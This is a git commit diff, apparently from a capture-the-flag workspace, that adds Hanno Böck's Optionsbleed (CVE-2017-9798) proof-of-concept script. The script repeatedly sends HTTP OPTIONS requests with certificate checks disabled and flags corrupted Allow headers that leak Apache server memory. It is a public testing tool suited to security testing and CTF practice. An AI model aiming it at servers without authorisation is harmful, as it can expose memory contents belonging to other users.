add some rooms

1 files changed, 76 insertions, 0 deletions

diff --git a/overpass3Hosting/42745.py b/overpass3Hosting/42745.py
new file mode 100755
index 0000000..87113b1
--- /dev/null
+++ b/overpass3Hosting/42745.py
@@ -0,0 +1,76 @@
+#!/usr/bin/env python3
+
+# Optionsbleed proof of concept test
+# by Hanno Böck
+
+import argparse
+import urllib3
+import re
+
+
+def test_bleed(url, args):
+    r = pool.request('OPTIONS', url)
+    try:
+        allow = str(r.headers["Allow"])
+    except KeyError:
+        return False
+    if allow in dup:
+        return
+    dup.append(allow)
+    if allow == "":
+        print("[empty] %s" % (url))
+    elif re.match("^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$", allow):
+        z = [x.strip() for x in allow.split(',')]
+        if len(z) > len(set(z)):
+            print("[duplicates] %s: %s" % (url, repr(allow)))
+        elif args.all:
+            print("[ok] %s: %s" % (url, repr(allow)))
+    elif re.match("^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? *)+$", allow):
+        print("[spaces] %s: %s" % (url, repr(allow)))
+    else:
+        print("[bleed] %s: %s" % (url, repr(allow)))
+    return True
+
+
+parser = argparse.ArgumentParser(
+         description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',
+         epilog="Tests server for Optionsbleed bug and other bugs in the allow header.\n\n"
+         "Autmatically checks http://, https://, http://www. and https://www. -\n"
+         "except if you pass -u/--url (which means by default we check 40 times.)\n\n"
+         "Explanation of results:\n"
+         "[bleed] corrupted header found, vulnerable\n"
+         "[empty] empty allow header, does not make sense\n"
+         "[spaces] space-separated method list (should be comma-separated)\n"
+         "[duplicates] duplicates in list (may be apache bug 61207)\n"
+         "[ok] normal list found (only shown with -a/--all)\n",
+         formatter_class=argparse.RawTextHelpFormatter)
+parser.add_argument('hosttocheck',  action='store',
+                    help='The hostname you want to test against')
+parser.add_argument('-n', nargs=1, type=int, default=[10],
+                    help='number of tests (default 10)')
+parser.add_argument("-a", "--all", action="store_true",
+                    help="show headers from hosts without problems")
+parser.add_argument("-u", "--url", action='store_true',
+                    help="pass URL instead of hostname")
+args = parser.parse_args()
+howoften = int(args.n[0])
+
+dup = []
+
+# Note: This disables warnings about the lack of certificate verification.
+# Usually this is a bad idea, but for this tool we want to find vulnerabilities
+# even if they are shipped with invalid certificates.
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+pool = urllib3.PoolManager(10, cert_reqs='CERT_NONE')
+
+if args.url:
+    test_bleed(args.hosttocheck, args)
+else:
+    for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:
+        for i in range(howoften):
+            try:
+                if test_bleed(prefix+args.hosttocheck, args) is False:
+                    break
+            except Exception as e:
+                pass
\ No newline at end of file